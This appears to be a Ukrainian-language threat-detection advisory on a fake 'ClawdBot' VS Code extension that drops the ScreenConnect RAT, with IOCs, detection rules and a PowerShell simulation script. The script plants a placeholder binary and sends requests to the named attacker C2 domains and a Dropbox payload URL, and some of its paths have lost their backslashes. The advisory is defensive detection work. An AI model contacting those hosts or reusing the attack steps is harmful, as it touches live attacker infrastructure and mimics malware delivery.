Фальшиве розширення ClowdBot для VS Code розповсюджує RAT ScreenConnect
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисне розширення для Visual Studio Code під назвою ClawdBot Agent видає себе за AI асистента по кодуванню, але таємно встановлює модифікований інструмент віддаленого доступу ScreenConnect на Windows при запуску VS Code. Під час запуску розширення отримує конфігураційний файл з домена, контрольованого атакуючим, потім завантажує і запускає підроблений двійковий файл VS Code (Code.exe) разом з допоміжними DLL. Як другий шлях доставки, воно може завантажити той самий інсталятор з посилання на Dropbox, щоб підтримувати доступність навантаження. Кампанія зловживає довіреним інструментом підтримки ІТ, щоб зливатися з легітимною діяльністю віддаленого адміністрування та знижувати підозри.
Розслідування
Дослідники отримали package.json розширення, підтвердили активацію при запуску VS Code і отримали віддалену JSON-конфігурацію, яка містить зловмисні компоненти. Аналіз двійкових файлів показав підписані модулі ScreenConnect, які відправляли сигнали на спеціальний релей-сервер. Додаткова логіка резервування була виявлена в JavaScript і PowerShell, з посиланнями на додаткові домени та навантаження, розміщені на Dropbox. Артефакти на диску були виявлені у папці %TEMP%Lightshot.
Захист
Видаліть розширення ClawdBot Agent з VS Code та видаліть залишкові файли з місця встановлення ScreenConnect і каталог %TEMP%Lightshot. Видаліть клієнтський сервіс ScreenConnect і блокуйте вихідні з’єднання до ідентифікованих релей-доменів та IP-адрес. Оновіть всі API-ключі або секрети, які могли бути введені у розширення.
Відповідь
Виявляйте зловмисне розширення, відстежуючи встановлення розширень VS Code та створення каталогу Lightshot. Попереджуйте про виконання Code.exe або ScreenConnect двійкових файлів з нестандартних шляхів і про вихідні з’єднання до meeting.bulletmailer.net:8041 або пов’язаних IP-адрес. Виконайте форензичний аналіз хоста, щоб підтвердити видалення постійності та виявити додаткові навантаження.
Потік атаки
Виявлення
Альтернативне програмне забезпечення для віддаленого доступу / управління (через process_creation)
Переглянути
Завантаження або вивантаження через Powershell (через cmdline)
Переглянути
Альтернативне програмне забезпечення для віддаленого доступу / управління (через audit)
Переглянути
Альтернативне програмне забезпечення для віддаленого доступу / управління (через system)
Переглянути
IOC (DestinationIP) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT
Переглянути
IOC (SourceIP) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT
Переглянути
IOC (HashSha256) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT
Переглянути
IOC (Emails) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT
Переглянути
Встановлення помилкового розширення ClawdBot VS Code інсталює RAT ScreenConnect [Створення процесу Windows]
Переглянути
Виявлення встановлення фальшивого розширення ClawdBot VS Code, яке інсталює RAT ScreenConnect [Підключення до мережі Windows]
Переглянути
Виконання симуляції
Передумова: Телеметрія та попередня перевірка бази повинні були пройти.
Наратив атаки та команди
- Атакуючий публікує троянський розширення для VS Code під назвою “Clawdbot Helper”.
-
Жертва встановлює розширення через маркетплейс VS Code, яке запускає
скрипт postinstallякий таємно поміщає клієнт ScreenConnect (ScreenConnect.Client.exe) в%APPDATA%ScreenConnect. - Безпосередньо за встановленнямклієнт ініціює три вихідні TCP-з’єднання до доменів C2, контрольованих атакуючим, щоб отримати додаткові навантаження та повідомити про статус хоста.
-
Вихідні з’єднання генерують записи Sysmon Event ID 3, які відповідають
списку dest_ip, задовольняючи правило виявлення.
Скрипт регресійного тестування
# --------------------------------------------------------------
# Імітація зловмисної процедур установки розширення VS Code
# --------------------------------------------------------------
# Крок 1 – Помістити муляжний двійковий файл ScreenConnect (симуляція)
$payloadPath = "$env:APPDATAScreenConnectScreenConnect.Client.exe"
New-Item -ItemType Directory -Path (Split-Path $payloadPath) -Force | Out-Null
# Створення безпечного файлу-заповнювача (наприклад, копія notepad.exe)
Copy-Item -Path "$env:SystemRootSystem32notepad.exe" -Destination $payloadPath -Force
# Крок 2 – Надіслати вихідні запити до кожного хоста C2
$c2Hosts = @(
"http://meeting.bulletmailer.net/collect",
"http://clawdbot.getintwopc.site/payload",
"https://www.dropbox.com/s/evilpayload.exe"
)
foreach ($url in $c2Hosts) {
try {
# Тиха веб-запит; -UseBasicParsing уникнення запрошень на UI
Invoke-WebRequest -Uri $url -Method GET -UseBasicParsing -TimeoutSec 5 | Out-Null
Write-Host "контакт з $url"
} catch {
Write-Host "Не вдалося сконтактувати з $url (очікувано в пісочниці)."
}
}
# Кінець скрипту – на цей момент Sysmon повинен був зафіксувати три
# Події підключення до мережі, чиї значення DestinationIp відповідають правилу.
Команди очищення
# --------------------------------------------------------------
# Видалення симульованих артефактів
# --------------------------------------------------------------
# Зупинити будь-які залишкові PowerShell завдання (жодного в цьому простому скрипті)
Get-Job | Remove-Job -Force
# Видалити муляжний каталог клієнта ScreenConnect
Remove-Item -Path "$env:APPDATAScreenConnect" -Recurse -Force
# Опціонально очистіть буфер Sysmon (потрібні права адміністратора)
# sysmon -c